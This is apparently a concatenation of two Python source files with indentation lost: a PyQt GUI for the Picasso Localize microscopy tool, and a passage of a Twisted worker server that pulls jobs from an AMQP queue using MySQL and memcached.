color = QtGui.QColor(QtCore.Qt.blue)
painter.setPen(QtGui.QPen(color))
rect = event.rect()
rect.setHeight(rect.height() - 1)
rect.setWidth(rect.width() - 1)
painter.drawRect(rect)
class View(QtGui.QGraphicsView):
""" The central widget which shows `Scene` objects of individual frames """
def __init__(self, window):
super().__init__(window)
self.window = window
self.setAcceptDrops(True)
self.pan = False
self.hscrollbar = self.horizontalScrollBar()
self.vscrollbar = self.verticalScrollBar()
self.rubberband = RubberBand(self)
self.roi = None
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
self.roi_origin = QtCore.QPoint(event.pos())
self.rubberband.setGeometry(QtCore.QRect(self.roi_origin, QtCore.QSize()))
self.rubberband.show()
elif event.button() == QtCore.Qt.RightButton:
self.pan = True
self.pan_start_x = event.x()
self.pan_start_y = event.y()
self.setCursor(QtCore.Qt.ClosedHandCursor)
event.accept()
else:
event.ignore()
def mouseMoveEvent(self, event):
if event.buttons() == QtCore.Qt.LeftButton:
self.rubberband.setGeometry(QtCore.QRect(self.roi_origin, event.pos()))
if self.pan:
self.hscrollbar.setValue(self.hscrollbar.value() - event.x() + self.pan_start_x)
self.vscrollbar.setValue(self.vscrollbar.value() - event.y() + self.pan_start_y)
self.pan_start_x = event.x()
self.pan_start_y = event.y()
event.accept()
else:
event.ignore()
def mouseReleaseEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
self.roi_end = QtCore.QPoint(event.pos())
dx = abs(self.roi_end.x() - self.roi_origin.x())
dy = abs(self.roi_end.y() - self.roi_origin.y())
if dx < 10 or dy < 10:
self.roi = None
self.rubberband.hide()
else:
roi_points = (self.mapToScene(self.roi_origin), self.mapToScene(self.roi_end))
self.roi = list([[int(_.y()), int(_.x())] for _ in roi_points])
self.window.draw_frame()
elif event.button() == QtCore.Qt.RightButton:
self.pan = False
self.setCursor(QtCore.Qt.ArrowCursor)
event.accept()
else:
event.ignore()
def wheelEvent(self, event):
""" Implements zoooming with the mouse wheel """
scale = 1.008 ** (-event.delta())
self.scale(scale, scale)
class Scene(QtGui.QGraphicsScene):
""" Scenes render indivdual frames and can be displayed in a `View` widget """
def __init__(self, window, parent=None):
super().__init__(parent)
self.window = window
self.dragMoveEvent = self.dragEnterEvent
def path_from_drop(self, event):
url = event.mimeData().urls()[0]
path = url.toLocalFile()
base, extension = os.path.splitext(path)
return path, extension
def drop_has_valid_url(self, event):
if not event.mimeData().hasUrls():
return False
path, extension = self.path_from_drop(event)
if extension.lower() not in ['.raw', '.yaml']:
return False
return True
def dragEnterEvent(self, event):
if self.drop_has_valid_url(event):
event.accept()
else:
event.ignore()
def dropEvent(self, event):
""" Loads raw movies or yaml parameters when dropped into the scene """
path, extension = self.path_from_drop(event)
if extension == '.raw':
self.window.open(path)
elif extension == '.yaml':
self.window.load_parameters(path)
else:
pass # TODO: send message to user
class FitMarker(QtGui.QGraphicsItemGroup):
def __init__(self, x, y, size, parent=None):
super().__init__(parent)
L = size/2
line1 = QtGui.QGraphicsLineItem(x-L, y-L, x+L, y+L)
line1.setPen(QtGui.QPen(QtGui.QColor(0, 255, 0)))
self.addToGroup(line1)
line2 = QtGui.QGraphicsLineItem(x-L, y+L, x+L, y-L)
line2.setPen(QtGui.QPen(QtGui.QColor(0, 255, 0)))
self.addToGroup(line2)
class OddSpinBox(QtGui.QSpinBox):
""" A spinbox that allows only odd numbers """
def __init__(self, parent=None):
super().__init__(parent)
self.setSingleStep(2)
self.valueChanged.connect(self.on_value_changed)
def on_value_changed(self, value):
if value % 2 == 0:
self.setValue(value + 1)
class ParametersDialog(QtGui.QDialog):
""" The dialog showing analysis parameters """
def __init__(self, parent=None):
super().__init__(parent)
self.window = parent
self.setWindowTitle('Parameters')
self.resize(300, 0)
self.setModal(False)
vbox = QtGui.QVBoxLayout(self)
identification_groupbox = QtGui.QGroupBox('Identification')
vbox.addWidget(identification_groupbox)
identification_grid = QtGui.QGridLayout(identification_groupbox)
# Box Size
identification_grid.addWidget(QtGui.QLabel('Box side length:'), 0, 0)
self.box_spinbox = OddSpinBox()
self.box_spinbox.setValue(DEFAULT_PARAMETERS['Box Size'])
self.box_spinbox.valueChanged.connect(self.on_box_changed)
identification_grid.addWidget(self.box_spinbox, 0, 1)
# Minimum LGM
identification_grid.addWidget(QtGui.QLabel('Minimum LGM:'), 1, 0)
self.mlgm_spinbox = QtGui.QSpinBox()
self.mlgm_spinbox.setRange(0, 999999)
self.mlgm_spinbox.setValue(DEFAULT_PARAMETERS['Minimum LGM'])
self.mlgm_spinbox.setKeyboardTracking(False)
self.mlgm_spinbox.valueChanged.connect(self.on_mlgm_spinbox_changed)
identification_grid.addWidget(self.mlgm_spinbox, 1, 1)
# Slider
self.mlgm_slider = QtGui.QSlider()
self.mlgm_slider.setOrientation(QtCore.Qt.Horizontal)
self.mlgm_slider.setRange(0, 10000)
self.mlgm_slider.setValue(DEFAULT_PARAMETERS['Minimum LGM'])
self.mlgm_slider.setSingleStep(1)
self.mlgm_slider.setPageStep(20)
self.mlgm_slider.valueChanged.connect(self.on_mlgm_slider_changed)
identification_grid.addWidget(self.mlgm_slider, 2, 0, 1, 2)
hbox = QtGui.QHBoxLayout()
identification_grid.addLayout(hbox, 3, 0, 1, 2)
# Min SpinBox
self.mlgm_min_spinbox = QtGui.QSpinBox()
self.mlgm_min_spinbox.setRange(0, 999999)
self.mlgm_min_spinbox.setKeyboardTracking(False)
self.mlgm_min_spinbox.setValue(0)
self.mlgm_min_spinbox.valueChanged.connect(self.on_mlgm_min_changed)
hbox.addWidget(self.mlgm_min_spinbox)
hbox.addStretch(1)
# Max SpinBox
self.mlgm_max_spinbox = QtGui.QSpinBox()
self.mlgm_max_spinbox.setKeyboardTracking(False)
self.mlgm_max_spinbox.setRange(0, 999999)
self.mlgm_max_spinbox.setValue(10000)
self.mlgm_max_spinbox.valueChanged.connect(self.on_mlgm_max_changed)
hbox.addWidget(self.mlgm_max_spinbox)
self.preview_checkbox = QtGui.QCheckBox('Preview')
self.preview_checkbox.setTristate(False)
# self.preview_checkbox.setChecked(True)
self.preview_checkbox.stateChanged.connect(self.on_preview_changed)
identification_grid.addWidget(self.preview_checkbox, 4, 0)
fit_groupbox = QtGui.QGroupBox('Fitting')
vbox.addWidget(fit_groupbox)
fit_grid = QtGui.QGridLayout(fit_groupbox)
# Camera
fit_grid.addWidget(QtGui.QLabel('Camera:'), 0, 0)
self.camera_combo = QtGui.QComboBox()
self.camera_combo.currentIndexChanged.connect(self.on_camera_changed)
fit_grid.addWidget(self.camera_combo, 0, 1)
self.em_checkbox = QtGui.QCheckBox('Electron Multiplying')
self.em_checkbox.toggled.connect(self.update_readmodes)
fit_grid.addWidget(self.em_checkbox, 1, 1)
fit_grid.addWidget(QtGui.QLabel('EM Real Gain:'), 2, 0)
self.gain_spinbox = QtGui.QSpinBox()
self.gain_spinbox.setRange(1, 1000)
fit_grid.addWidget(self.gain_spinbox, 2, 1)
fit_grid.addWidget(QtGui.QLabel('Readout Mode:'), 3, 0)
self.readmode_combo = QtGui.QComboBox()
self.readmode_combo.currentIndexChanged.connect(self.update_preamps)
fit_grid.addWidget(self.readmode_combo, 3, 1)
fit_grid.addWidget(QtGui.QLabel('Pre-Amp Gain:'), 4, 0)
self.preamp_combo = QtGui.QComboBox()
fit_grid.addWidget(self.preamp_combo, 4, 1)
fit_grid.addWidget(QtGui.QLabel('Excitation Wavelength:'), 5, 0)
self.excitation_combo = QtGui.QComboBox()
fit_grid.addWidget(self.excitation_combo, 5, 1)
self.camera_combo.addItems([''] + sorted(list(localize.CONFIG['Cameras'].keys())))
def on_camera_changed(self, index):
self.update_readmodes(index)
self.excitation_combo.clear()
camera = self.camera_combo.currentText()
if camera:
wavelengths = sorted(list(localize.CONFIG['Cameras'][camera]['Quantum Efficiency'].keys()))
wavelengths = [str(_) for _ in wavelengths]
self.excitation_combo.addItems([''] + wavelengths)
def update_readmodes(self, index):
self.readmode_combo.clear()
camera = self.camera_combo.currentText()
if camera:
if localize.CONFIG['Cameras'][camera]['Sensor'] == 'EMCCD':
em = self.em_checkbox.isChecked()
self.readmode_combo.addItems([''] + sorted(list(localize.CONFIG['Cameras'][camera]['Sensitivity'][em].keys())))
def update_preamps(self, index):
self.preamp_combo.clear()
camera = self.camera_combo.currentText()
if camera:
if localize.CONFIG['Cameras'][camera]['Sensor'] == 'EMCCD':
em = self.em_checkbox.isChecked()
readmode = self.readmode_combo.currentText()
if readmode:
preamps = range(len(localize.CONFIG['Cameras'][camera]['Sensitivity'][em][readmode]))
preamps = [''] + [str(_ + 1) for _ in list(preamps)]
self.preamp_combo.addItems(preamps)
def on_box_changed(self, value):
self.window.on_parameters_changed()
def on_mlgm_spinbox_changed(self, value):
if value < self.mlgm_slider.minimum():
self.mlgm_min_spinbox.setValue(value)
if value > self.mlgm_slider.maximum():
self.mlgm_max_spinbox.setValue(value)
self.mlgm_slider.setValue(value)
def on_mlgm_slider_changed(self, value):
self.mlgm_spinbox.setValue(value)
if self.preview_checkbox.isChecked():
self.window.on_parameters_changed()
def on_mlgm_min_changed(self, value):
self.mlgm_slider.setMinimum(value)
def on_mlgm_max_changed(self, value):
self.mlgm_slider.setMaximum(value)
def on_preview_changed(self, state):
self.window.draw_frame()
def set_camera_parameters(self, parameters):
self.camera_combo.setCurrentIndex(0)
if 'Camera' in parameters:
camera = parameters['Camera']
for index in range(self.camera_combo.count()):
if self.camera_combo.itemText(index) == camera:
self.camera_combo.setCurrentIndex(index)
break
if 'Electron Multiplying' in parameters:
self.em_checkbox.setChecked(parameters['Electron Multiplying'])
if parameters['Electron Multiplying']:
if 'EM Real Gain' in parameters:
self.gain_spinbox.setValue(parameters['EM Real Gain'])
self.readmode_combo.setCurrentIndex(0)
if 'Readout Mode' in parameters:
for index in range(self.readmode_combo.count()):
if self.readmode_combo.itemText(index) == parameters['Readout Mode']:
self.readmode_combo.setCurrentIndex(index)
break
self.preamp_combo.setCurrentIndex(0)
if 'Pre-Amp Gain' in parameters:
for index in range(self.preamp_combo.count()):
if self.preamp_combo.itemText(index) == str(parameters['Pre-Amp Gain']):
self.preamp_combo.setCurrentIndex(index)
break
self.excitation_combo.setCurrentIndex(0)
if 'Excitation Wavelength' in parameters:
for index in range(1, self.excitation_combo.count()):
if int(self.excitation_combo.itemText(index)) == parameters['Excitation Wavelength']:
self.excitation_combo.setCurrentIndex(index)
break
def get_camera_parameters(self):
camera = self.camera_combo.currentText()
parameters = {'Camera': self.camera_combo.currentText()}
if localize.CONFIG['Cameras'][camera]['Sensor'] == 'EMCCD':
parameters['Electron Multiplying'] = self.em_checkbox.isChecked()
parameters['EM Real Gain'] = self.gain_spinbox.value()
parameters['Readout Mode'] = self.readmode_combo.currentText()
parameters['Pre-Amp Gain'] = int(self.preamp_combo.currentText())
elif localize.CONFIG['Cameras'][camera]['Sensor'] == 'sCMOS':
pass
try:
parameters['Excitation Wavelength'] = int(self.excitation_combo.currentText())
except ValueError:
raise ValueError('You must set the wavelength!')
return parameters
class ContrastDialog(QtGui.QDialog):
def __init__(self, window):
super().__init__(window)
self.window = window
self.setWindowTitle('Contrast')
self.resize(200, 0)
self.setModal(False)
grid = QtGui.QGridLayout(self)
black_label = QtGui.QLabel('Black:')
grid.addWidget(black_label, 0, 0)
self.black_spinbox = QtGui.QSpinBox()
self.black_spinbox.setKeyboardTracking(False)
self.black_spinbox.setRange(0, 999999)
self.black_spinbox.valueChanged.connect(self.on_contrast_changed)
grid.addWidget(self.black_spinbox, 0, 1)
white_label = QtGui.QLabel('White:')
grid.addWidget(white_label, 1, 0)
self.white_spinbox = QtGui.QSpinBox()
self.white_spinbox.setKeyboardTracking(False)
self.white_spinbox.setRange(0, 999999)
self.white_spinbox.valueChanged.connect(self.on_contrast_changed)
grid.addWidget(self.white_spinbox, 1, 1)
self.auto_checkbox = QtGui.QCheckBox('Auto')
self.auto_checkbox.setTristate(False)
self.auto_checkbox.setChecked(True)
self.auto_checkbox.stateChanged.connect(self.on_auto_changed)
grid.addWidget(self.auto_checkbox, 2, 0, 1, 2)
self.silent_contrast_change = False
def change_contrast_silently(self, black, white):
self.silent_contrast_change = True
self.black_spinbox.setValue(black)
self.white_spinbox.setValue(white)
self.silent_contrast_change = False
def on_contrast_changed(self, value):
if not self.silent_contrast_change:
self.auto_checkbox.setChecked(False)
self.window.draw_frame()
def on_auto_changed(self, state):
if state:
movie = self.window.movie
frame_number = self.window.current_frame_number
frame = movie[frame_number]
self.change_contrast_silently(frame.min(), frame.max())
self.window.draw_frame()
class Window(QtGui.QMainWindow):
""" The main window """
def __init__(self):
super().__init__()
# Init GUI
self.setWindowTitle('Picasso: Localize')
this_directory = os.path.dirname(os.path.realpath(__file__))
icon_path = os.path.join(this_directory, 'localize.ico')
icon = QtGui.QIcon(icon_path)
self.setWindowIcon(icon)
self.resize(768, 768)
self.parameters_dialog = ParametersDialog(self)
self.contrast_dialog = ContrastDialog(self)
self.init_menu_bar()
self.view = View(self)
self.setCentralWidget(self.view)
self.scene = Scene(self)
self.view.setScene(self.scene)
self.status_bar = self.statusBar()
self.status_bar_frame_indicator = QtGui.QLabel()
self.status_bar.addPermanentWidget(self.status_bar_frame_indicator)
#: Holds the current movie as a numpy memmap in the format (frame, y, x)
self.movie = None
#: A dictionary of analysis parameters used for the last operation
self.last_identification_info = None
#: A numpy.recarray of identifcations with fields frame, x and y
self.identifications = None
self.ready_for_fit = False
self.locs = None
def init_menu_bar(self):
menu_bar = self.menuBar()
""" File """
file_menu = menu_bar.addMenu('File')
open_action = file_menu.addAction('Open movie')
open_action.setShortcut('Ctrl+O')
open_action.triggered.connect(self.open_file_dialog)
file_menu.addAction(open_action)
save_action = file_menu.addAction('Save localizations')
save_action.setShortcut('Ctrl+S')
save_action.triggered.connect(self.save_locs_dialog)
file_menu.addAction(save_action)
file_menu.addSeparator()
# open_parameters_action = file_menu.addAction('Load parameters')
# open_parameters_action.setShortcut('Ctrl+Shift+O')
# open_parameters_action.triggered.connect(self.open_parameters)
# file_menu.addAction(open_parameters_action)
# save_parameters_action = file_menu.addAction('Save parameters')
# save_parameters_action.setShortcut('Ctrl+Shift+S')
# save_parameters_action.triggered.connect(self.save_parameters)
# file_menu.addAction(save_parameters_action)
""" View """
view_menu = menu_bar.addMenu('View')
previous_frame_action = view_menu.addAction('Previous frame')
previous_frame_action.setShortcut('Left')
previous_frame_action.triggered.connect(self.previous_frame)
view_menu.addAction(previous_frame_action)
next_frame_action = view_menu.addAction('Next frame')
next_frame_action.setShortcut('Right')
next_frame_action.triggered.connect(self.next_frame)
view_menu.addAction(next_frame_action)
view_menu.addSeparator()
first_frame_action = view_menu.addAction('First frame')
first_frame_action.setShortcut('Home')
first_frame_action.triggered.connect(self.first_frame)
view_menu.addAction(first_frame_action)
last_frame_action = view_menu.addAction('Last frame')
last_frame_action.setShortcut('End')
last_frame_action.triggered.connect(self.last_frame)
view_menu.addAction(last_frame_action)
go_to_frame_action = view_menu.addAction('Go to frame')
go_to_frame_action.setShortcut('Ctrl+G')
go_to_frame_action.triggered.connect(self.to_frame)
view_menu.addAction(go_to_frame_action)
view_menu.addSeparator()
zoom_in_action = view_menu.addAction('Zoom in')
zoom_in_action.setShortcuts(['Ctrl++', 'Ctrl+='])
zoom_in_action.triggered.connect(self.zoom_in)
view_menu.addAction(zoom_in_action)
zoom_out_action = view_menu.addAction('Zoom out')
zoom_out_action.setShortcut('Ctrl+-')
zoom_out_action.triggered.connect(self.zoom_out)
view_menu.addAction(zoom_out_action)
fit_in_view_action = view_menu.addAction('Fit image to window')
fit_in_view_action.setShortcut('Ctrl+W')
fit_in_view_action.triggered.connect(self.fit_in_view)
view_menu.addAction(fit_in_view_action)
view_menu.addSeparator()
display_settings_action = view_menu.addAction('Contrast')
display_settings_action.setShortcut('Ctrl+C')
display_settings_action.triggered.connect(self.contrast_dialog.show)
view_menu.addAction(display_settings_action)
""" Analyze """
analyze_menu = menu_bar.addMenu('Analyze')
parameters_action = analyze_menu.addAction('Parameters')
parameters_action.setShortcut('Ctrl+P')
parameters_action.triggered.connect(self.parameters_dialog.show)
analyze_menu.addAction(parameters_action)
analyze_menu.addSeparator()
identify_action = analyze_menu.addAction('Identify')
identify_action.setShortcut('Ctrl+I')
identify_action.triggered.connect(self.identify)
analyze_menu.addAction(identify_action)
fit_action = analyze_menu.addAction('Fit')
fit_action.setShortcut('Ctrl+F')
fit_action.triggered.connect(self.fit)
analyze_menu.addAction(fit_action)
localize_action = analyze_menu.addAction('Localize (Identify && Fit)')
localize_action.setShortcut('Ctrl+L')
localize_action.triggered.connect(self.localize)
analyze_menu.addAction(localize_action)
def open_file_dialog(self):
path = QtGui.QFileDialog.getOpenFileName(self, 'Open image sequence', filter='*.raw')
if path:
self.open(path)
def open(self, path):
try:
self.movie, self.info = io.load_raw(path, memory_map=True)
self.movie_path = path
self.identifications = None
self.locs = None
self.ready_for_fit = False
self.set_frame(0)
self.fit_in_view()
self.parameters_dialog.set_camera_parameters(self.info[0])
except FileNotFoundError:
pass # TODO send a message
def previous_frame(self):
if self.movie is not None:
if self.current_frame_number > 0:
self.set_frame(self.current_frame_number - 1)
def next_frame(self):
if self.movie is not None:
if self.current_frame_number + 1 < self.info[0]['Frames']:
self.set_frame(self.current_frame_number + 1)
def first_frame(self):
if self.movie is not None:
self.set_frame(0)
def last_frame(self):
if self.movie is not None:
self.set_frame(self.info[0]['Frames'] - 1)
def to_frame(self):
if self.movie is not None:
frames = self.info[0]['Frames']
number, ok = QtGui.QInputDialog.getInt(self, 'Go to frame', 'Frame number:', self.current_frame_number+1, 1, frames)
if ok:
self.set_frame(number - 1)
def set_frame(self, number):
self.current_frame_number = number
if self.contrast_dialog.auto_checkbox.isChecked():
black = self.movie[number].min()
white = self.movie[number].max()
self.contrast_dialog.change_contrast_silently(black, white)
self.draw_frame()
self.status_bar_frame_indicator.setText('{:,}/{:,}'.format(number + 1, self.info[0]['Frames']))
def draw_frame(self):
if self.movie is not None:
frame = self.movie[self.current_frame_number]
frame = frame.astype('float32')
if self.contrast_dialog.auto_checkbox.isChecked():
frame -= frame.min()
frame /= frame.max()
else:
frame -= self.contrast_dialog.black_spinbox.value()
frame /= self.contrast_dialog.white_spinbox.value()
frame *= 255.0
frame = np.maximum(frame, 0)
frame = np.minimum(frame, 255)
frame = frame.astype('uint8')
height, width = frame.shape
image = QtGui.QImage(frame.data, width, height, width, QtGui.QImage.Format_Indexed8)
image.setColorTable(CMAP_GRAYSCALE)
pixmap = QtGui.QPixmap.fromImage(image)
self.scene = Scene(self)
self.scene.addPixmap(pixmap)
self.view.setScene(self.scene)
if self.ready_for_fit:
identifications_frame = self.identifications[self.identifications.frame == self.current_frame_number]
box = self.last_identification_info['Box Size']
self.draw_identifications(identifications_frame, box, QtGui.QColor('yellow'))
else:
if self.parameters_dialog.preview_checkbox.isChecked():
identifications_frame = localize.identify_by_frame_number(self.movie,
self.parameters,
self.current_frame_number,
self.view.roi)
box = self.parameters['Box Size']
self.status_bar.showMessage('Found {:,} spots in current frame.'.format(len(identifications_frame)))
self.draw_identifications(identifications_frame, box, QtGui.QColor('red'))
else:
self.status_bar.showMessage('')
if self.locs is not None:
locs_frame = self.locs[self.locs.frame == self.current_frame_number]
for loc in locs_frame:
self.scene.addItem(FitMarker(loc.x+0.5, loc.y+0.5, 1))
def draw_identifications(self, identifications, box, color):
box_half = int(box / 2)
for identification in identifications:
x = identification.x
y = identification.y
self.scene.addRect(x - box_half, y - box_half, box, box, color)
def open_parameters(self):
path = QtGui.QFileDialog.getOpenFileName(self, 'Open parameters', filter='*.yaml')
if path:
self.load_parameters(path)
def load_parameters(self, path):
with open(path, 'r') as file:
parameters = yaml.load(file)
self.parameters_dialog.box_spinbox.setValue(parameters['Box Size'])
self.parameters_dialog.mlgm_spinbox.setValue(parameters['Minimum LGM'])
self.status_bar.showMessage('Parameter file {} loaded.'.format(path))
def save_parameters(self):
path = QtGui.QFileDialog.getSaveFileName(self, 'Save parameters', filter='*.yaml')
if path:
with open(path, 'w') as file:
yaml.dump(self.parameters, file, default_flow_style=False)
@property
def parameters(self):
return {'Box Size': self.parameters_dialog.box_spinbox.value(),
'Minimum LGM': self.parameters_dialog.mlgm_slider.value()}
def on_parameters_changed(self):
self.locs = None
self.ready_for_fit = False
self.draw_frame()
def identify(self, fit_afterwards=False):
if self.movie is not None:
self.status_bar.showMessage('Preparing identification...')
self.identificaton_worker = IdentificationWorker(self, fit_afterwards)
self.identificaton_worker.progressMade.connect(self.on_identify_progress)
self.identificaton_worker.finished.connect(self.on_identify_finished)
self.identificaton_worker.start()
def on_identify_progress(self, frame_number, parameters):
n_frames = self.info[0]['Frames']
box = parameters['Box Size']
mmlg = parameters['Minimum LGM']
message = 'Identifying in frame {:,}/{:,} (Box Size: {:,}; Minimum LGM: {:,})...'.format(frame_number,
n_frames,
box,
mmlg)
self.status_bar.showMessage(message)
def on_identify_finished(self, parameters, roi, identifications, fit_afterwards):
if len(identifications):
self.locs = None
self.last_identification_info = parameters.copy()
self.last_identification_info['ROI'] = roi
n_identifications = len(identifications)
box = parameters['Box Size']
mmlg = parameters['Minimum LGM']
message = 'Identified {:,} spots (Box Size: {:,}; Minimum LGM: {:,}). Ready for fit.'.format(n_identifications,
box, mmlg)
self.status_bar.showMessage(message)
self.identifications = identifications
self.ready_for_fit = True
self.draw_frame()
if fit_afterwards:
self.fit()
def fit(self):
if self.movie is not None and self.ready_for_fit:
self.status_bar.showMessage('Preparing fit...')
parameters = self.parameters_dialog.get_camera_parameters()
camera = parameters['Camera']
sensor = localize.CONFIG['Cameras'][camera]['Sensor']
camera_info = {'sensor': sensor}
if sensor == 'EMCCD':
em = parameters['Electron Multiplying']
readmode = parameters['Readout Mode']
preamp = parameters['Pre-Amp Gain'] - 1
camera_info['sensitivity'] = localize.CONFIG['Cameras'][camera]['Sensitivity'][em][readmode][preamp]
if em:
camera_info['gain'] = parameters['EM Real Gain']
else:
camera_info['gain'] = 1
elif sensor == 'sCMOS':
pass # put calibration here
excitation = parameters['Excitation Wavelength']
camera_info['qe'] = localize.CONFIG['Cameras'][camera]['Quantum Efficiency'][excitation]
self.fit_worker = FitWorker(self.movie, camera_info, self.identifications, self.parameters['Box Size'])
self.fit_worker.progressMade.connect(self.on_fit_progress)
self.fit_worker.finished.connect(self.on_fit_finished)
self.fit_worker.start()
def on_fit_progress(self, current, n_spots):
message = 'Fitting spot {:,}/{:,}...'.format(current, n_spots)
self.status_bar.showMessage(message)
def on_fit_finished(self, locs):
self.status_bar.showMessage('Fitted {:,} spots.'.format(len(locs)))
self.locs = locs
self.draw_frame()
base, ext = os.path.splitext(self.movie_path)
self.save_locs(base + '_locs.hdf5')
def fit_in_view(self):
self.view.fitInView(self.scene.sceneRect(), QtCore.Qt.KeepAspectRatio)
def zoom_in(self):
self.view.scale(10 / 7, 10 / 7)
def zoom_out(self):
self.view.scale(7 / 10, 7 / 10)
def save_locs(self, path):
localize_info = self.last_identification_info.copy()
localize_info['Generated by'] = 'Picasso Localize'
info = self.info + [localize_info]
io.save_locs(path, self.locs, info)
def save_locs_dialog(self):
base, ext = os.path.splitext(self.movie_path)
locs_path = base + '_locs.hdf5'
path = QtGui.QFileDialog.getSaveFileName(self, 'Save localizations', locs_path, filter='*.hdf5')
if path:
self.save_locs(path)
def localize(self):
self.identify(fit_afterwards=True)
class IdentificationWorker(QtCore.QThread):
progressMade = QtCore.pyqtSignal(int, dict)
finished = QtCore.pyqtSignal(dict, object, np.recarray, bool)
def __init__(self, window, fit_afterwards):
super().__init__()
self.window = window
self.movie = window.movie
self.roi = window.view.roi
self.parameters = window.parameters
self.fit_afterwards = fit_afterwards
def run(self):
futures = localize.identify_async(self.movie, self.parameters, self.roi)
not_done = futures
while not_done:
done, not_done = wait(futures, 0.1)
self.progressMade.emit(len(done), self.parameters)
identifications = np.hstack([_.result() for _ in futures]).view(np.recarray)
self.finished.emit(self.parameters, self.roi, identifications, self.fit_afterwards)
class FitWorker(QtCore.QThread):
progressMade = QtCore.pyqtSignal(int, int)
finished = QtCore.pyqtSignal(np.recarray)
def __init__(self, movie, camera_info, identifications, box):
super().__init__()
self.movie = movie
self.camera_info = camera_info
self.identifications = identifications
self.box = box
def run(self):
thread, fit_info = localize.fit_async(self.movie, self.camera_info, self.identifications, self.box)
while thread.is_alive():
self.progressMade.emit(fit_info.current, fit_info.n_spots)
time.sleep(0.1)
thread.join() # just in case...
locs = localize.locs_from_fit_info(fit_info, self.identifications, self.box)
self.finished.emit(locs)
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
window = Window()
window.show()
def excepthook(type, value, tback):
message = ''.join(traceback.format_exception(type, value, tback))
errorbox = QtGui.QMessageBox.critical(window, 'An error occured', message)
errorbox.exec_()
sys.__excepthook__(type, value, tback)
sys.excepthook = excepthook
sys.exit(app.exec_())
|
from .base import BaseServer, LOGGER
from ..resources2 import WorkerResource
from ..networkaddress import getNetworkAddress
from ..amqp import amqp as AMQP
from ..resources import InterfaceResource, ExposedResource
from MySQLdb.cursors import DictCursor
from twisted.internet import reactor, protocol, task
from twisted.enterprise import adbapi
from twisted.web import server
from twisted.protocols.memcache import MemCacheProtocol, DEFAULT_PORT
from twisted.internet.defer import Deferred, DeferredList, maybeDeferred, inlineCallbacks
from twisted.internet.threads import deferToThread
from uuid import UUID, uuid4
import pprint
import cPickle as pickle
PRETTYPRINTER = pprint.PrettyPrinter(indent=4)
class WorkerServer(BaseServer):
public_ip = None
local_ip = None
network_information = {}
simultaneous_jobs = 100
doSomethingCallLater = None
jobs_complete = 0
job_queue = []
job_queue_a = job_queue.append
def __init__(self,
aws_access_key_id,
aws_secret_access_key,
aws_s3_http_cache_bucket=None,
aws_s3_storage_bucket=None,
mysql_username=None,
mysql_password=None,
mysql_host=None,
mysql_database=None,
amqp_host=None,
amqp_username=None,
amqp_password=None,
amqp_vhost=None,
amqp_queue=None,
amqp_exchange=None,
memcached_host=None,
resource_mapping=None,
amqp_port=5672,
amqp_prefetch_count=1000,
mysql_port=3306,
memcached_port=11211,
max_simultaneous_requests=100,
max_requests_per_host_per_second=0,
max_simultaneous_requests_per_host=0,
port=5005,
log_file='workerserver.log',
log_directory=None,
log_level="debug"):
self.network_information["port"] = port
# Create MySQL connection.
self.mysql = adbapi.ConnectionPool(
"MySQLdb",
db=mysql_database,
port=mysql_port,
user=mysql_username,
passwd=mysql_password,
host=mysql_host,
cp_reconnect=True,
cursorclass=DictCursor)
# Create Memcached client
self.memcached_host = memcached_host
self.memcached_port = memcached_port
self.memc_ClientCreator = protocol.ClientCreator(
reactor, MemCacheProtocol)
# Resource Mappings
self.resource_mapping = resource_mapping
# HTTP interface
resource = WorkerResource(self)
self.site_port = reactor.listenTCP(port, server.Site(resource))
# Create AMQP Connection
# AMQP connection parameters
self.amqp_host = amqp_host
self.amqp_vhost = amqp_vhost
self.amqp_port = amqp_port
self.amqp_username = amqp_username
self.amqp_password = amqp_password
self.amqp_queue = amqp_queue
self.amqp_exchange = amqp_exchange
self.amqp_prefetch_count = amqp_prefetch_count
BaseServer.__init__(
self,
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
aws_s3_http_cache_bucket=aws_s3_http_cache_bucket,
aws_s3_storage_bucket=aws_s3_storage_bucket,
max_simultaneous_requests=max_simultaneous_requests,
max_requests_per_host_per_second=max_requests_per_host_per_second,
max_simultaneous_requests_per_host=max_simultaneous_requests_per_host,
log_file=log_file,
log_directory=log_directory,
log_level=log_level)
def start(self):
reactor.callWhenRunning(self._start)
return self.start_deferred
@inlineCallbacks
def _start(self):
yield self.getNetworkAddress()
# Create memcached client
self.memc = yield self.memc_ClientCreator.connectTCP(self.memcached_host, self.memcached_port)
LOGGER.info('Connecting to broker.')
self.conn = yield AMQP.createClient(
self.amqp_host,
self.amqp_vhost,
self.amqp_port)
self.auth = yield self.conn.authenticate(
self.amqp_username,
self.amqp_password)
self.chan = yield self.conn.channel(1)
yield self.chan.channel_open()
yield self.chan.basic_qos(prefetch_count=self.amqp_prefetch_count)
# Create Queue
yield self.chan.queue_declare(
queue=self.amqp_queue,
durable=False,
exclusive=False,
auto_delete=False)
yield self.chan.queue_bind(
queue=self.amqp_queue,
exchange=self.amqp_exchange)
d = self.chan.basic_consume(queue=self.amqp_queue,
no_ack=False,
consumer_tag="awspider_consumer")
d.addCallback(self.dequeue)
self.queue = yield self.conn.queue("awspider_consumer")
yield BaseServer.start(self)
self.jobsloop = task.LoopingCall(self.executeJobs)
self.jobsloop.start(1)
@inlineCallbacks
def shutdown(self):
LOGGER.debug("Closting connection")
try:
self.doSomethingCallLater.cancel()
except:
pass
# Shut things down
LOGGER.info('Closing broker connection')
yield self.chan.channel_close()
chan0 = yield self.conn.channel(0)
yield chan0.connection_close()
def dequeue(self, consumer=None):
deferToThread(self._dequeue)
def _dequeue(self):
d = self.queue.get()
d.addCallback(self._dequeue2)
d.addErrback(self.workerError)
def _dequeue2(self, msg):
if msg:
# Get the hex version of the UUID from byte string we were sent
uuid = UUID(bytes=msg.content.body).hex
d = self.getJob(uuid)
d.addCallback(self._dequeue3, msg)
d.addErrback(self.workerError)
def _dequeue3(self, job, msg):
if job:
# Load custom function.
if job['function_name'] in self.functions:
job['exposed_function'] = self.functions[job['function_name']]
else:
LOGGER.error("Could not find function %s." % job['function_name'])
LOGGER.info('Pulled job off of AMQP queue')
job['kwargs'] = self.mapKwargs(job)
d = self.chan.basic_ack(delivery_tag=msg.delivery_tag)
self.job_queue_a(job)
self.dequeueCallLater = reactor.callLater(1, self._dequeue)
def executeJobs(self):
while len(self.job_queue) > 0 and len(self.active_jobs) < self.simultaneous_jobs:
job = self.job_queue.pop(0)
